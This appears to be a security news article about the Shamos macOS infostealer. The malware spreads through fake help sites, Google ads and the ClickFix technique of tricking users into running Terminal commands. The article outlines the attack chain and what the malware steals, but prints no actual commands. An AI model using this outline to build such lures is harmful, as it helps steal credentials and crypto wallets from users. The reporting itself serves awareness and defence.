Fake macOS Help Sites Spread Shamos Infostealer via ClickFix
▼ Summary
– Criminals are using fraudulent macOS help websites and Google ads to trick users into installing the Shamos infostealer by having them run malicious commands.
– The Shamos malware, a variant of the Atomic macOS infostealer, steals sensitive data like Keychain entries, browser credentials, and cryptocurrency wallet files.
– Attackers employ the ClickFix technique to bypass macOS security features like Gatekeeper by having users execute commands directly in Terminal.
– ClickFix is a growing social engineering tactic effective across Windows, macOS, and Linux due to convincing lures and technical-looking instructions.
– Threat actors are widely adopting and evolving ClickFix, with builders sold on hacker forums and similar techniques like FileFix emerging.
Cybercriminals are increasingly exploiting the trust of macOS users seeking technical support by luring them into installing the Shamos infostealer malware through deceptive help websites. A recent campaign observed between June and August 2025 used malicious Google ads to direct users to fraudulent domains like mac-safer[.]com and rescue-mac[.]com. These sites provided what appeared to be legitimate troubleshooting steps but actually guided users to execute a harmful command in Terminal, leading to the installation of Shamos.
This malware employs the ClickFix social engineering technique, which relies on users manually running commands to bypass macOS security protections like Gatekeeper. Once executed, the malicious script downloads the Shamos executable into the /tmp directory, strips extended attributes to evade detection, grants execution permissions, and runs the stealer. The malware performs anti-virtual machine checks to avoid analysis environments and conducts extensive reconnaissance on the host system.
Shamos collects a wide range of sensitive data, including credentials from Keychain, AppleNotes, and various browsers. It also searches for cryptocurrency wallet files and exfiltrates the stolen information in a compressed archive using curl. Additionally, the malware attempts to download a spoofed Ledger Live application and a botnet module, while creating a persistence mechanism through a Plist file.
In a separate malvertising effort, threat actors set up a fake GitHub repository offering a compromised version of the iTerm2 terminal emulator. The installation instructions included the same malicious command used in the help site campaign, further expanding the attack vector.
The ClickFix method has gained significant traction among cybercriminals and advanced persistent threat (APT) groups due to its high success rate. This technique uses convincing error messages, fake CAPTCHAs, and simple-looking instructions that many users follow without understanding the risks. It effectively targets Windows, macOS, and Linux systems through various channels including phishing emails, social media platforms, and search engine ads.
Microsoft Threat Intelligence has reported that ClickFix builders are being sold on hacker forums, often bundled with other malicious tools that generate LNK, JavaScript, and SVG files. These kits sometimes include pre-built landing pages with lures mimicking legitimate services like Cloudflare.
The success of ClickFix has inspired the development of similar methods such as FileFix, which tricks users into executing malicious commands through everyday actions in Windows File Explorer. Security researchers note that threat actors are already experimenting with these new techniques, highlighting the need for increased user awareness and robust security measures.
To stay informed about the latest threats and vulnerabilities, consider subscribing to cybersecurity alert services.
(Source: HelpNet Security)
